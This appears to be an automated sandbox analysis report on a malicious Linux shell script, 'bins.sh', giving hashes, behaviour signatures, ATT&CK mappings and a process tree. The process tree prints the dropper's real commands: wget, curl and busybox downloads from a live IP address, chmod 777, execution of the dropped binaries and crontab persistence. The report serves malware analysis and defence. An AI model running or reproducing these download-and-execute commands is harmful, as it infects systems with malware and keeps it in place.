ed0804977957488f570fda99c514fa0c6d363077f227de75b18857a47976523f

Analysis

max time kernel
149s
max time network
175s
platform
debian-9_armhf
resource
debian9-armhf-20240611-en
resource tags

arch:armhfimage:debian9-armhf-20240611-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem
submitted
23-11-2024 20:47

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

bins.sh
Size

10KB
MD5

acc93149a703834c82d35c5b31becff8
SHA1

c3d8bf660a21eb45784dc9329194a0e80df1afca
SHA256

ed0804977957488f570fda99c514fa0c6d363077f227de75b18857a47976523f
SHA512

f8a9605ba45f141cadc156e369c781a754c0b300c0e6b14b01f4bd4e8d20be1f1ed6e748456d97cd052148bfa5faf31b79bbb34e625a0bcaac1a04ab52d4d120
SSDEEP

192:mzkzszjA8AaiuKN1i72Pm2JG76GflnTlCQA1Z1ZdZc7PS9l9N9Me7xxq7maMV9LV:TWjruyx+F

Score

9^/10

antivm defense_evasion discovery execution persistence privilege_escalatio

Malware Config

Signatures

Contacts a large (2099) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
discovery

Network Service Discovery
T1046
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
discovery

Network Service Discovery
T1046
File and Directory Permissions Modification 1 TTPs 3 IoCs
Adversaries may modify file or directory permissions to evade defenses.
defense_evasion

Linux and Mac File and Directory Permissions Modification
T1222.002

Processes:

chmodchmodchmod

pid process

723 chmod
681 chmod
699 chmod

pid	process
723	chmod
681	chmod
699	chmod

Executes dropped EXE 3 IoCs

Processes:

3yJJ4lrT0xkVJKVOSghK0haZldCpD6ZVkdsjajpkHvqsA4OeviY1zjwFRZ2J8abQTykyPwgTyHw9VWdc1t0PKG5zFID4dX9GNxbrZr

ioc	pid	process
/tmp/3yJJ4lrT0xkVJKVOSghK0haZldCpD6ZVkd	682	3yJJ4lrT0xkVJKVOSghK0haZldCpD6ZVkd
/tmp/sjajpkHvqsA4OeviY1zjwFRZ2J8abQTyky	700	sjajpkHvqsA4OeviY1zjwFRZ2J8abQTyky
/tmp/PwgTyHw9VWdc1t0PKG5zFID4dX9GNxbrZr	724	PwgTyHw9VWdc1t0PKG5zFID4dX9GNxbrZr

Renames itself 1 IoCs

Processes:

PwgTyHw9VWdc1t0PKG5zFID4dX9GNxbrZr

pid process

725 PwgTyHw9VWdc1t0PKG5zFID4dX9GNxbrZr
Creates/modifies Cron job 1 TTPs 1 IoCs
Cron allows running tasks on a schedule, and is commonly used for malware persistence.
execution persistence privilege_escalatio

Cron
T1053.003

Processes:

crontab

description ioc process

File opened for modification /var/spool/cron/crontabs/tmp.owurO5 crontab
Enumerates running processes
Discovers information about currently running processes on the system
Checks CPU configuration 1 TTPs 3 IoCs
Checks CPU information which indicate if the system is a virtual machine.
antivm

System Checks
T1497.001

Processes:

curlcurlcurl

description ioc process

File opened for reading /proc/cpuinfo curl
File opened for reading /proc/cpuinfo curl
File opened for reading /proc/cpuinfo curl

pid	process
725	PwgTyHw9VWdc1t0PKG5zFID4dX9GNxbrZr

description	ioc	process
File opened for modification	/var/spool/cron/crontabs/tmp.owurO5	crontab

description	ioc	process
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl

Reads runtime system information 64 IoCs

Reads data from /proc virtual filesystem.

discovery

Processes:

PwgTyHw9VWdc1t0PKG5zFID4dX9GNxbrZrcurlcurl

description	ioc	process
File opened for reading	/proc/963/cmdline	PwgTyHw9VWdc1t0PKG5zFID4dX9GNxbrZr
File opened for reading	/proc/981/cmdline	PwgTyHw9VWdc1t0PKG5zFID4dX9GNxbrZr
File opened for reading	/proc/13/cmdline	PwgTyHw9VWdc1t0PKG5zFID4dX9GNxbrZr
File opened for reading	/proc/19/cmdline	PwgTyHw9VWdc1t0PKG5zFID4dX9GNxbrZr
File opened for reading	/proc/21/cmdline	PwgTyHw9VWdc1t0PKG5zFID4dX9GNxbrZr
File opened for reading	/proc/42/cmdline	PwgTyHw9VWdc1t0PKG5zFID4dX9GNxbrZr
File opened for reading	/proc/903/cmdline	PwgTyHw9VWdc1t0PKG5zFID4dX9GNxbrZr
File opened for reading	/proc/941/cmdline	PwgTyHw9VWdc1t0PKG5zFID4dX9GNxbrZr
File opened for reading	/proc/965/cmdline	PwgTyHw9VWdc1t0PKG5zFID4dX9GNxbrZr
File opened for reading	/proc/777/cmdline	PwgTyHw9VWdc1t0PKG5zFID4dX9GNxbrZr
File opened for reading	/proc/786/cmdline	PwgTyHw9VWdc1t0PKG5zFID4dX9GNxbrZr
File opened for reading	/proc/802/cmdline	PwgTyHw9VWdc1t0PKG5zFID4dX9GNxbrZr
File opened for reading	/proc/818/cmdline	PwgTyHw9VWdc1t0PKG5zFID4dX9GNxbrZr
File opened for reading	/proc/938/cmdline	PwgTyHw9VWdc1t0PKG5zFID4dX9GNxbrZr
File opened for reading	/proc/953/cmdline	PwgTyHw9VWdc1t0PKG5zFID4dX9GNxbrZr
File opened for reading	/proc/7/cmdline	PwgTyHw9VWdc1t0PKG5zFID4dX9GNxbrZr
File opened for reading	/proc/905/cmdline	PwgTyHw9VWdc1t0PKG5zFID4dX9GNxbrZr
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/2/cmdline	PwgTyHw9VWdc1t0PKG5zFID4dX9GNxbrZr
File opened for reading	/proc/919/cmdline	PwgTyHw9VWdc1t0PKG5zFID4dX9GNxbrZr
File opened for reading	/proc/984/cmdline	PwgTyHw9VWdc1t0PKG5zFID4dX9GNxbrZr
File opened for reading	/proc/1007/cmdline	PwgTyHw9VWdc1t0PKG5zFID4dX9GNxbrZr
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/15/cmdline	PwgTyHw9VWdc1t0PKG5zFID4dX9GNxbrZr
File opened for reading	/proc/17/cmdline	PwgTyHw9VWdc1t0PKG5zFID4dX9GNxbrZr
File opened for reading	/proc/29/cmdline	PwgTyHw9VWdc1t0PKG5zFID4dX9GNxbrZr
File opened for reading	/proc/312/cmdline	PwgTyHw9VWdc1t0PKG5zFID4dX9GNxbrZr
File opened for reading	/proc/867/cmdline	PwgTyHw9VWdc1t0PKG5zFID4dX9GNxbrZr
File opened for reading	/proc/791/cmdline	PwgTyHw9VWdc1t0PKG5zFID4dX9GNxbrZr
File opened for reading	/proc/853/cmdline	PwgTyHw9VWdc1t0PKG5zFID4dX9GNxbrZr
File opened for reading	/proc/27/cmdline	PwgTyHw9VWdc1t0PKG5zFID4dX9GNxbrZr
File opened for reading	/proc/137/cmdline	PwgTyHw9VWdc1t0PKG5zFID4dX9GNxbrZr
File opened for reading	/proc/166/cmdline	PwgTyHw9VWdc1t0PKG5zFID4dX9GNxbrZr
File opened for reading	/proc/300/cmdline	PwgTyHw9VWdc1t0PKG5zFID4dX9GNxbrZr
File opened for reading	/proc/642/cmdline	PwgTyHw9VWdc1t0PKG5zFID4dX9GNxbrZr
File opened for reading	/proc/770/cmdline	PwgTyHw9VWdc1t0PKG5zFID4dX9GNxbrZr
File opened for reading	/proc/901/cmdline	PwgTyHw9VWdc1t0PKG5zFID4dX9GNxbrZr
File opened for reading	/proc/922/cmdline	PwgTyHw9VWdc1t0PKG5zFID4dX9GNxbrZr
File opened for reading	/proc/945/cmdline	PwgTyHw9VWdc1t0PKG5zFID4dX9GNxbrZr
File opened for reading	/proc/1009/cmdline	PwgTyHw9VWdc1t0PKG5zFID4dX9GNxbrZr
File opened for reading	/proc/760/cmdline	PwgTyHw9VWdc1t0PKG5zFID4dX9GNxbrZr
File opened for reading	/proc/804/cmdline	PwgTyHw9VWdc1t0PKG5zFID4dX9GNxbrZr
File opened for reading	/proc/931/cmdline	PwgTyHw9VWdc1t0PKG5zFID4dX9GNxbrZr
File opened for reading	/proc/944/cmdline	PwgTyHw9VWdc1t0PKG5zFID4dX9GNxbrZr
File opened for reading	/proc/875/cmdline	PwgTyHw9VWdc1t0PKG5zFID4dX9GNxbrZr
File opened for reading	/proc/911/cmdline	PwgTyHw9VWdc1t0PKG5zFID4dX9GNxbrZr
File opened for reading	/proc/1/cmdline	PwgTyHw9VWdc1t0PKG5zFID4dX9GNxbrZr
File opened for reading	/proc/8/cmdline	PwgTyHw9VWdc1t0PKG5zFID4dX9GNxbrZr
File opened for reading	/proc/28/cmdline	PwgTyHw9VWdc1t0PKG5zFID4dX9GNxbrZr
File opened for reading	/proc/764/cmdline	PwgTyHw9VWdc1t0PKG5zFID4dX9GNxbrZr
File opened for reading	/proc/797/cmdline	PwgTyHw9VWdc1t0PKG5zFID4dX9GNxbrZr
File opened for reading	/proc/865/cmdline	PwgTyHw9VWdc1t0PKG5zFID4dX9GNxbrZr
File opened for reading	/proc/960/cmdline	PwgTyHw9VWdc1t0PKG5zFID4dX9GNxbrZr
File opened for reading	/proc/990/cmdline	PwgTyHw9VWdc1t0PKG5zFID4dX9GNxbrZr
File opened for reading	/proc/23/cmdline	PwgTyHw9VWdc1t0PKG5zFID4dX9GNxbrZr
File opened for reading	/proc/578/cmdline	PwgTyHw9VWdc1t0PKG5zFID4dX9GNxbrZr
File opened for reading	/proc/814/cmdline	PwgTyHw9VWdc1t0PKG5zFID4dX9GNxbrZr
File opened for reading	/proc/833/cmdline	PwgTyHw9VWdc1t0PKG5zFID4dX9GNxbrZr
File opened for reading	/proc/835/cmdline	PwgTyHw9VWdc1t0PKG5zFID4dX9GNxbrZr
File opened for reading	/proc/923/cmdline	PwgTyHw9VWdc1t0PKG5zFID4dX9GNxbrZr
File opened for reading	/proc/212/cmdline	PwgTyHw9VWdc1t0PKG5zFID4dX9GNxbrZr
File opened for reading	/proc/893/cmdline	PwgTyHw9VWdc1t0PKG5zFID4dX9GNxbrZr
File opened for reading	/proc/1000/cmdline	PwgTyHw9VWdc1t0PKG5zFID4dX9GNxbrZr
File opened for reading	/proc/648/cmdline	PwgTyHw9VWdc1t0PKG5zFID4dX9GNxbrZr

Writes file to tmp directory 9 IoCs

Malware often drops required files in the /tmp directory.

Processes:

curlbusyboxwgetbusyboxbusyboxwgetwgetcurlcurl

description	ioc	process
File opened for modification	/tmp/3yJJ4lrT0xkVJKVOSghK0haZldCpD6ZVkd	curl
File opened for modification	/tmp/3yJJ4lrT0xkVJKVOSghK0haZldCpD6ZVkd	busybox
File opened for modification	/tmp/sjajpkHvqsA4OeviY1zjwFRZ2J8abQTyky	wget
File opened for modification	/tmp/sjajpkHvqsA4OeviY1zjwFRZ2J8abQTyky	busybox
File opened for modification	/tmp/PwgTyHw9VWdc1t0PKG5zFID4dX9GNxbrZr	busybox
File opened for modification	/tmp/3yJJ4lrT0xkVJKVOSghK0haZldCpD6ZVkd	wget
File opened for modification	/tmp/PwgTyHw9VWdc1t0PKG5zFID4dX9GNxbrZr	wget
File opened for modification	/tmp/PwgTyHw9VWdc1t0PKG5zFID4dX9GNxbrZr	curl
File opened for modification	/tmp/sjajpkHvqsA4OeviY1zjwFRZ2J8abQTyky	curl

/tmp/bins.sh
/tmp/bins.sh
1⤵
PID:650
- /bin/rm
  /bin/rm bins.sh
  2⤵
  PID:652
- /usr/bin/wget
  wget http://87.120.125.191/bins/3yJJ4lrT0xkVJKVOSghK0haZldCpD6ZVkd
  2⤵
  - Writes file to tmp directory
  PID:655
- /usr/bin/curl
  curl -O http://87.120.125.191/bins/3yJJ4lrT0xkVJKVOSghK0haZldCpD6ZVkd
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:672
- /bin/busybox
  /bin/busybox wget http://87.120.125.191/bins/3yJJ4lrT0xkVJKVOSghK0haZldCpD6ZVkd
  2⤵
  - Writes file to tmp directory
  PID:680
- /bin/chmod
  chmod 777 3yJJ4lrT0xkVJKVOSghK0haZldCpD6ZVkd
  2⤵
  - File and Directory Permissions Modification
  PID:681
- /tmp/3yJJ4lrT0xkVJKVOSghK0haZldCpD6ZVkd
  ./3yJJ4lrT0xkVJKVOSghK0haZldCpD6ZVkd
  2⤵
  - Executes dropped EXE
  PID:682
- /bin/rm
  rm 3yJJ4lrT0xkVJKVOSghK0haZldCpD6ZVkd
  2⤵
  PID:684
- /usr/bin/wget
  wget http://87.120.125.191/bins/sjajpkHvqsA4OeviY1zjwFRZ2J8abQTyky
  2⤵
  - Writes file to tmp directory
  PID:685
- /usr/bin/curl
  curl -O http://87.120.125.191/bins/sjajpkHvqsA4OeviY1zjwFRZ2J8abQTyky
  2⤵
  - Checks CPU configuration
  - Writes file to tmp directory
  PID:687
- /bin/busybox
  /bin/busybox wget http://87.120.125.191/bins/sjajpkHvqsA4OeviY1zjwFRZ2J8abQTyky
  2⤵
  - Writes file to tmp directory
  PID:695
- /bin/chmod
  chmod 777 sjajpkHvqsA4OeviY1zjwFRZ2J8abQTyky
  2⤵
  - File and Directory Permissions Modification
  PID:699
- /tmp/sjajpkHvqsA4OeviY1zjwFRZ2J8abQTyky
  ./sjajpkHvqsA4OeviY1zjwFRZ2J8abQTyky
  2⤵
  - Executes dropped EXE
  PID:700
- /bin/rm
  rm sjajpkHvqsA4OeviY1zjwFRZ2J8abQTyky
  2⤵
  PID:703
- /usr/bin/wget
  wget http://87.120.125.191/bins/PwgTyHw9VWdc1t0PKG5zFID4dX9GNxbrZr
  2⤵
  - Writes file to tmp directory
  PID:704
- /usr/bin/curl
  curl -O http://87.120.125.191/bins/PwgTyHw9VWdc1t0PKG5zFID4dX9GNxbrZr
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:711
- /bin/busybox
  /bin/busybox wget http://87.120.125.191/bins/PwgTyHw9VWdc1t0PKG5zFID4dX9GNxbrZr
  2⤵
  - Writes file to tmp directory
  PID:719
- /bin/chmod
  chmod 777 PwgTyHw9VWdc1t0PKG5zFID4dX9GNxbrZr
  2⤵
  - File and Directory Permissions Modification
  PID:723
- /tmp/PwgTyHw9VWdc1t0PKG5zFID4dX9GNxbrZr
  ./PwgTyHw9VWdc1t0PKG5zFID4dX9GNxbrZr
  2⤵
  - Executes dropped EXE
  - Renames itself
  - Reads runtime system information
  PID:724
- - /bin/sh
    sh -c "crontab -l"
    3⤵
    PID:726
  - - /usr/bin/crontab
      crontab -l
      4⤵
      PID:728
- - /bin/sh
    sh -c "crontab -"
    3⤵
    PID:732
  - - /usr/bin/crontab
      crontab -
      4⤵
      Creates/modifies Cron job
      PID:733
- /bin/rm
  rm PwgTyHw9VWdc1t0PKG5zFID4dX9GNxbrZr
  2⤵
  PID:746
- /usr/bin/wget
  wget http://87.120.125.191/bins/OzB9XCRAN0iKCjL76G5jJJXHMonpHMDCB1
  2⤵
  PID:749

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Cron

T1053.003

Persistence

Scheduled Task/Job

T1053

Cron

T1053.003

Privilege Escalation

Scheduled Task/Job

T1053

Cron

T1053.003

Defense Evasion

File and Directory Permissions Modification

T1222

Linux and Mac File and Directory Permissions Modification

T1222.002

Virtualization/Sandbox Evasion

T1497

System Checks

T1497.001

Credential Access

Discovery

Network Service Discovery

T1046

Virtualization/Sandbox Evasion

T1497

System Checks

T1497.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/tmp/3yJJ4lrT0xkVJKVOSghK0haZldCpD6ZVkd

Filesize
107KB

MD5
eb9c3a0de91fcf16ba17cb24608df68c

SHA1
09d95a7d70d5e115d103be51edff7c498d272fac

SHA256
dd01a1365a9f35501e09e0144ed1d4d8b00dcf20aa66cf6dc186e94d7dbe4b47

SHA512
9e1f3f88f82bb41c68d78b351c8dc8075522d6d42063f798b6ef38a491df7a3bab2c312d536fb0a6333e516d7dc4f5a58b80beb69422a04d1dbc61eaba346e27

Download Submit
/tmp/PwgTyHw9VWdc1t0PKG5zFID4dX9GNxbrZr

Filesize
141KB

MD5
3ca8decdb1e52c423c521bfff02ac200

SHA1
8621ecd6807109b8541912ad9e134f6fb49bfd48

SHA256
dee3a1252e88f188c362e08b16ece678559ad2566511871f5cde69296f6c779f

SHA512
b6f89d7875d584c109f30814738fec4fe04619745941d9cbbff20bbefbab454dee7180321f6913da1a3b89fba2dc743b28631e52261539d091cc802a5c7a1c7a

Download Submit
/tmp/sjajpkHvqsA4OeviY1zjwFRZ2J8abQTyky

Filesize
98KB

MD5
5141342d0df8699fa32a6b066a0c592e

SHA1
8157673225bd5182f16215e2aa823a25ca2d4fbc

SHA256
54302d130cd356fb19ea5a763c5ab6b0892fc234118f10ba3196ec4245c83b4d

SHA512
d6b24571e7691227abafc70133a1da007c97c2730c820de77a750d2c140a8a75554cc614b4729debc4ec5480124252737c5846a458a5146005285c6d3f9e3801

Download Submit
/var/spool/cron/crontabs/tmp.owurO5

Filesize
210B

MD5
3d0d9a89bcad4781c1ad6ee99fc257bb

SHA1
51e3402e9108380791ddcaccca4828bf24f33d0f

SHA256
97ab554af661e56ce6bcc7a95913e9906bd4398e6ba94e02f7e27afff97f0324

SHA512
e784af264be73a0ed5e021e022b2b909f21b5a3a1c19f86e8efdccbcc76d5ef0ab3e3fd65e83376cb8aff5649b05bea70b9866b47afd92d1a1d8f09f123375f6

Download Submit